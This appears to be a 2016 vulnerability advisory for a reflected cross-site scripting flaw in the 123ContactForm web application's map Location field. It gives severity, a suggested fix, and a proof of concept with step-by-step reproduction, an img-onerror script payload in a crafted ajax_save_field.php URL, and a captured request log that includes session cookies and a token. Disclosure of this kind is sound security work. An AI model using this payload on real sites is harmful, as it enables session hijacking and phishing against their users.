123ContactForm – Cross Site Scripting Vulnerability

A client-side cross site scripting vulnerability has been discovered in the 123Contact Form web-application. The security vulnerability allows remote attackers to inject malicious script codes to client-side browser requests.

A client-side cross site scripting web vulnerability is located in the `Location` input field. The web vulnerability could allow remote attackers to execute javascript in the web-browser of an user or administrator to compromise session credentials. The attacker can connect to a third account to trigger the issue without knowing the password.

The security risk of the xss vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3.Exploitation of the non-persistent cross site scripting web vulnerability requires low or medium user interaction and no privileged web-application user account. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Location – Map Pro

Vulnerable File(s):
[+] ajax_save_field.php

Vulnerable Parameter(s):
[+] value

Date of Discovery:
==================

2016-10-16

Exploitation Technique:
=======================

Local

Platfom Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================

The vulnerability can be patched by a secure parse of the vulnerable value parameter in the affected ajax php file. Restrict the input by disallowing the usage of special chars and filter for script code tags. Encode the vulnerable output location by a parse of the context to prevent an execute of malicious script codes in the formular.

Levels Risk:

Proof of Concept (PoC):
=======================

The cross site vulnerability can be exploited by remote attackers with web-application user account and with low or medium user interaction.
For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Create an user account
2. Connect to the dashboard and click on "Create New Form"
3. Click on "Event Registration Form"
4. Click on the Map Google at buttom and click on the link "Customize Map"
5. Customize Map opens a window
6. Copy paste the vector ( '"><img src=x onerror=alert(domain)> ) in input "Location" to execute via value
6. Finally click "Save"
7. A messagebox appreas on execute successfully by the value parameter


--- PoC Pictures ---
http://zwx.fr/POCXSS.PNG
http://zwx.fr/POCXSS2.PNG


PoC: URL
https://123contactform.localhost/ajax_save_field.php
?cid=22812003&fid=2248753&pro=map_c_values&
islikert=0&value=[CLIENT SIDE SCRIPT CODE INJECT!]&
selectedformcreated=1476438146&selecteduser=1077591&
cacheKiller=0.05597585558969986&selectedFieldControl=0&
containerForEditorActions=1


--- PoC Session Logs [GET] ---
Status: 200 [OK]
Host: www.123contactform.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
theToken: d2767e1cdf526c38c5a8d14e8
Referer: https://www.123contactform.com/index.php?p=edit_fields&id=2248753&action=firsttime
Cookie: x-channel=website; x-subchannel=website; x-source=organic; user_type=unknown; x-campaign=no-campaign; x-landing=%2Fsecurity-acknowledgements.htm; 123cf=64AEAFD7-855C-40D4-BAEE-406B081CF758; referer123cookie=http%3A%2F%2Fbugsheet.com%2Fdirectory; AWSELB=596B2BAD0280A921E426D1B649308CC69A1C856B743EDCBCE34D07E0A9EC55A2DFD9A6A3D2B6C5F677E4C749D525B848D39C268A28FBC6E570CCD431ECA0C0ECD30A1D13A4; SnapABugHistory=2#; _ga=GA1.2.2031563181.1476410572; __ar_v4=WFH7JRHHDNEVZPPCUQ2ABR%3A20161013%3A54%7CMLVDQJATP5EPDMGBRC5TRU%3A20161013%3A54%7CILTNEPP2HZFL7AMBEUMFOE%3A20161013%3A54; __reff=[[www.123contactform.com/security-acknowledgements.htm]]bugsheet.com&1476410574641.1476412397387.7|[[www.123contactform.com/index.php]](direct)&1476437441090.1476437441090.1; spid=CD6108C6-3D7D-491B-8934-5156A4E6A99B; sp_apnxid=3900529803954807116; mktz_client=%7B%22is_returning%22%3A%221%22%2C%22uid%22%3A%2213325530231307318897%22%2C%22session%22%3A%22ses499300756ion%22%2C%22views%22%3A2%2C%22referer_url%22%3A%22http%3A//www.123contactform.com/security-acknowledgements.htm%22%2C%22referer_domain%22%3A%22www.123contactform.com%22%2C%22referer_type%22%3A%22refferal%22%2C%22visits%22%3A1%2C%22landing%22%3A%22http%3A//www.123contactform.com/%22%2C%22enter_at%22%3A%222016-10-14%7C4%3A3%3A14%22%2C%22first_visit%22%3A%222016-10-14%7C4%3A3%3A14%22%2C%22last_visit%22%3A%222016-10-14%7C4%3A3%3A14%22%2C%22last_variation%22%3A%22%22%2C%22utm_source%22%3Afalse%2C%22utm_term%22%3Afalse%2C%22utm_campaign%22%3Afalse%2C%22utm_content%22%3Afalse%2C%22utm_medium%22%3Afalse%7D; optimizelySegments=%7B%223013120790%22%3A%22false%22%2C%223022890169%22%3A%22direct%22%2C%223024180249%22%3A%22ff%22%7D; optimizelyEndUserId=oeu1476410633006r0.5762439056508796; optimizelyBuckets=%7B%7D; __utma=95039516.2031563181.1476410572.1476410679.1476410679.1; __utmz=95039516.1476410679.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1s49us046u1nca63s90a4lbpq2; SnapABugRef=http%3A%2F%2Fwww.123contactform.com%2Fsecurity-acknowledgements.htm%20http%3A%2F%2Fbugsheet.com%2Fdirectory; SnapABugVisit=27#1476437435; sp_ssid=1476437441027; __sreff=1476437441090.1476437441090.1; UTM_usrprf=0%7C1476410503; UTM_last_login=1476437278; acknowledgeCookie=1; _gat_UA-305159-5=1; SnapABugChatWindow=%7C0%7C-1%2C0%2C-1%2C0
Connection: keep-alive
-
https://www.123contactform.com/ajax_save_field.php?cid=22812003&fid=2248753&pro=map_c_values&islikert=0&value='"><img src=x onerror=alert(domain)>&selectedformcreated=1476438146&selecteduser=1077591&cacheKiller=0.05597585558969986&selectedFieldControl=0&containerForEditorActions=1

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*